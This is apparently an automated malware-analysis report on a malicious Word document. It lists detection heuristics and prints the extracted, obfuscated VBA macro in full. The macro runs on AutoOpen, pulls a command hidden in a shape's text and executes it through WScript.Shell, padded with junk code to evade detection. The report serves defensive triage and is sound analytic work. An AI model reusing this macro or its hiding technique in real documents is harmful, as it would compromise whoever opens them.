MALICIOUS
232
Risk Score
Heuristics 9
-
ClamAV: Doc.Malware.Sagent-6813871-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sagent-6813871-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5742 bytes |
SHA-256: aedacd7e282f64b6d7178c16f25db2287c8439c417be4c9358a02ef71a877310 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
91 of 147 identifiers look randomly generated (e.g. 'jXVvYtOSvkzz') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jXVvYtOSvkzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case vHbqjzq
Case 302725929
QiIZwh = 261928046
HUFwnG = CLng(166584178)
Case 280890079
wYrcCtjn = Oct(tvfoq)
UifKuV = FjzaR
Case 21230282
IACzrBS = CDate(nOoYm)
oriSdoiI = Int(179586883 * wSsSKf)
End Select
On Error Resume Next
Select Case jdBWRTp
Case 116921515
ATGcYh = 341377692
jfJdHbV = CLng(276448663)
Case 74708770
wZlhPtdp = Oct(zVqSWaP)
cravHpni = jwbBjjG
Case 204895382
raTEMzjCC = CDate(tMnDs)
twksrkww = Int(245725438 * jNdRo)
End Select
On Error Resume Next
Select Case OmfRiG
Case 97475170
haLwF = 188657891
qhBTj = CLng(297233802)
Case 271834843
dqRPLFN = Oct(MLzoj)
GGIuXZusX = qBqEvv
Case 185280007
YOCbNrD = CDate(TQwmGobAa)
KmVPdkSAZ = Int(65111219 * IORjYP)
End Select
Set ftRqbGiu = Shapes("pOlvcnLMEQjF")
On Error Resume Next
Select Case vubMiddQi
Case 230556574
stKAlaaWu = 63475444
hoCIN = CLng(120094517)
Case 190011316
YUswwOXi = Oct(NtTuvOmAJ)
vvwKF = nNmKaQLn
Case 270736379
iAvMlN = CDate(aIBqNmaPH)
LhtbJ = Int(258912727 * KBkUZ)
End Select
On Error Resume Next
Select Case MkZYZGki
Case 166386747
BOZTv = 240781802
XUpkm = CLng(113599619)
Case 170814409
SQGIFB = Oct(MdYRKEC)
bklzAdCiK = wXlSz
Case 175220290
zEGqda = CDate(IYBwvi)
zUZOzAR = Int(170097540 * PhvBJiqui)
End Select
On Error Resume Next
Select Case XwlnEvP
Case 244736724
NtTop = 846523
wirmJs = CLng(176322135)
Case 180900483
iNSDwCDRn = Oct(jdLTZBE)
NEzUFPD = wmDUiV
Case 64366555
WiwhLKqBA = CDate(QokLRl)
TNWzN = Int(49577694 * AjGQO)
End Select
ujJbDvPR = "" + TUzrFX + OvUqw + lVRQLIm + ftRqbGiu.TextFrame.TextRange.Text + athfD + hTCUQNaj + JIEsQ + AUvwCjF
On Error Resume Next
Select Case zAKUiGCo
Case 161882589
XuBRJ = 110841253
mwGbw = CLng(237881028)
Case 115353838
joJrJPfEu = Oct(djKFrkzA)
wwXsK = zHKkKwQt
Case 195538711
RswOqsqHf = CDate(kzjHVbzj)
tJvzMMI = Int(140591649 * knMmjI)
End Select
On Error Resume Next
Select Case wSjfh
Case 244841668
VKziCVkJo = 117201747
zunYS = CLng(277456066)
Case 340572131
PVFri = Oct(EdfFcn)
BBNKUdfz = rzKHzZQ
Case 168417067
tfcVW = CDate(TONzrE)
LiXvs = Int(170877653 * zMTHui)
End Select
Set ndKtkQv = GetObject(aViNGFjH + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + jfwqG)
On Error Resume Next
Select Case FnrDSXPb
Case 120137855
JHUoTOmL = 244161218
UzAllzb = CLng(135077707)
Case 48915476
waciK = Oct(kUYYVZL)
MtVci = IrRTR
Case 49447877
FRVwvUOr = CDate(fpiuiSmM)
umzYs = Int(183938782 * qzvFJJNCm)
End Select
On Error Resume Next
Select Case zdJfUlcXE
Case 289920356
VbdaV = 129466248
iiBmuwvw = CLng(331496348)
Case 95127897
UamuLClZ = Oct(LDNPq)
tjisiflN = CvLjM
Case 236787184
mOmjRPa = CDate(bpvOWf)
mvHDOT = Int(38142965 * GjNfsPrC)
End Select
Const NRsBilV = 0
On Error Resume Next
Select Case HHcbC
Case 341665938
jUwFStYN = 219853738
BiJNS = CLng(333961959)
Case 174234950
kOwsjKpf = Oct(atHLjsti)
MiUfisHsU = OppIBmSl
Case 283045593
kmQmMwUZq = CDate(mPjTmrU)
fElrp = Int(54604621 * rkkGZN)
End Select
ndKtkQv.Run@ ujJbDvPR, NRsBilV
On Error Resume Next
Select Case IzAPhTdJM
Case 326335513
oOkrPlK = 103001967
kdcKGC = CLng(23139221)
Case 38783127
BlwWWIIiz = Oct(miPbnY)
pFzwiZzCL = WpIiQXO
Case 70413592
YRrbik = CDate(wdbVCpmO)
zGwTLw = Int(127388358 * dmoojV)
End Select
On Error Resume Next
Select Case BFkuSDu
Case 223818561
aabRjUS = 307904585
OKVqSS = CLng(33886513)
Case 15298314
bkSRwGLwq = Oct(FtEWmM)
KNznVQiR = hzKmSp
Case 105026759
SzHJi = CDate(FjdGpXJ)
jdfHrELG = Int(130599209 * AiYMlEsQ)
End Select
On Error Resume Next
Select Case wGdiw
Case 29005930
iSSHqKmVl = 312477297
GSvPAvIVJ = CLng(28555733)
Case 235332298
zmzTUCSSw = Oct(bfGbBtjlh)
DNAwOjFhV = vtwUSUt
Case 284134565
SSdBNq = CDate(JZtOlX)
tulmAFl = Int(317965065 * wVwihlIh)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.